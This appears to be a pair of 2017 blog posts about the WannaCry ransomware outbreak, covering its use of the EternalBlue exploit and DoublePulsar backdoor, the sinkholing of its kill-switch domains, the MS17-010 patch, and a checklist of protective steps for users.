WannaCry primarily utilizes the EternalBlue exploit but is also used in conjunction with the DoublePulsar backdoor. EternalBlue is utilized for the initial exploitation of the SMB vulnerability, if successful then the DoublePulsar backdoor is implanted which in turn is used to install the malware. Microsoft had released security patches for all Operating Systems currently in support and extended support, these were released back in March although this resolves the ExternalBlue exploit this does not necessarily mean you are protected as WannaCry is designed so that if the EternalBlue exploit fails it will proceed and check if the target already has the DoublePulsar back-door installed. This could have been installed prior to the patch by another hacker, even the NSA since this was originally part of their hacking toolkit before ShadowBrokers publicly released it.

On Friday evening the first variant was halted by a British security researcher MalwareTechBlog  who after analyzing some of the code found it pointed to an unregistered domain (iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea [dot] com) and so decided to buy the domain and sinkhole it. Now maybe I am pessimistic but upon hearing this I immediately thought one thing “it’s not over, this is just the start”, and over the weekend I started to try to gather more and more information on this to understand it, the logical next step for the WannaCry creators is to change the kill-switch or to remove it entirely, without a kill-switch this would be a complete nightmare for all sysadmins around the world.

Throughout the weekend Security Researchers have been working to get hold of some of the samples to break them down and understand them, one researcher from France who uses the twitter handle @benkow_ discovered a new variant, WannaCrypt0r 2.0, he in turn sent it onto anothe IT Security Researcher Matthieu Suiche for an in-depth analysis. Upon analyzing, Matthieu discovered a kill-switch again but this one linked to another domain (ifferfsodp9ifjaposdfjhgosurijfaewrwergwea [dot] com). Matthieu has since added a post to his blog explaining how he found it and registered the domain.

Working with MalwareTech, Matthieu transferred this additional domain to MalwareTech’s sinkhole, to which MalwareTech posted the below to Twitter.

“Thanks to @benkow_ who found what looks like a new ‘kill switch’ domain and @msuiche who registered it and transferred it to our sinkhole.”

Earlier I thought “it’s not over” and it appears I might be right, the predictions that the fast-spreading WannaCry RansomWare would quickly evolve to get around its domain-based kill switch were everywhere, and, well… the predictions are starting to come true, we are already seeing reports of different domain names being used and a few where researchers have claimed to have found some without any kill-switch whatsoever, (these researchers have since back tracked and it looks like they might have not been using a fresh sample from the wild). I still believe that the kill-switch will be removed, it might not be done by the original creators but by a copycat group but the exploits and code is out there so its just a matter of time.

The taking down of these kill-switches is just a temporary measure; one should expect new variants released and as such security measure should be implemented now to prevent falling victim later.

  1. Do not open an unknown email
  2. Do not download files from an unknown email
  3. Do not click files from an unknown email
  4. Avoid visiting malicious sites
  5. Do not download software and apps from a third-party store/website
  6. Enable “Show hidden file extensions” and only open a file if its the extension you expect
  7. Apply any pending software updates and keep them up-to date
  8. Make sure you are using a reputable security suite/Anti-Virus
  9. Back up your data on a regular basis
  10. Use System Restore to get back to a known-clean state

What additional steps Microsoft users should take?

Microsoft Windows is the ultimate target of this cyber attack since WannaCry exploits a security flaw within the SMB protocol, to mitigate the risk patch MS17-010 should be applied urgently if not already applied, to aid in this please find below the direct links to each download from Microsoft:

Windows XP SP3 //

Windows Vista x86 //

Windows Vista x64 //

Windows 7 x64 //

Windows 7 x86 //

Windows 8 //

Windows 8.1 //

Windows 10 //

Windows 2003 x86 //

Windows 2003 x64 //

Windows 2008 //

Windows 2008R2 //

Windows 2012 //

Windows 2012R2 //

Windows 2016 //

WannaCRY and the DoublePulsar Exlpoit

WannaCRY and the DoublePulsar Exlpoit

As many saw yesterday the NHS faced a major outage and they were not alone, yesterday saw a mass outbreak of a new strain of RansomWare called “WannaCRY” (aka #WanaCypt0r aka #WCry), this may act like a normal RansomWare (in the sense that it encrypts all your files and demands a Ransom) but it does not necessarily get into systems like we have seen before.

On April 14th, 2017 some of you may have seen that group “Shadow Brokers” released a collection of tools that the NSA was using for hacking and taking unrestricted control of systems around the world, they did try to auction this off last year but were unsuccessful and so chose to release it to all. Within this collection of tools is one that has enabled the global attack yesterday, it has been dubbed the name “EternalBlue” and uses the SMBv1 and SMBv2 protocol of which when paired with “DoublePulsar” (Also in the NSA toolkit) DoublePulsar can then inject DLL’s into the target system enabling the attacker to take full control of the target system. To see how it works check out this link.

This is a very serious attack vector and Microsoft did release a patch on March 14th for it (before Shadow Brokers released it to all), the Microsoft patch is MS17-010 of which a breakdown of that can be found here.

Given the seriousness of this attack vector it is imperative to ensure that all of you business and personal Windows devices are patched an upto date, Microsoft have also released patches last night for some EOL (End of Lifetime) Operating Systems to try and minimize the risk to customer systems. The EOL devices added to receive these patches are for Windows Server 2003 (SP2 x64 / x86); Windows XP (SP2 x64, SP3 x86); Windows XP Embedded (SP3, x86); as well as the 32-bit and 64-bit versions of Windows 8.

Extract from Microsoft Statement: “Given the potential impact to customers and their businesses, we made the decision to make the Security Update for platforms in custom support only, Windows XP, Windows 8, and Windows Server 2003, broadly available for download. This decision was made based on an assessment of this situation, with the principle of protecting our customer ecosystem overall, firmly in mind.”

MalwareTech has also released a blog post explaining how he stopped WannaCRY in its tracks to read it follow this link.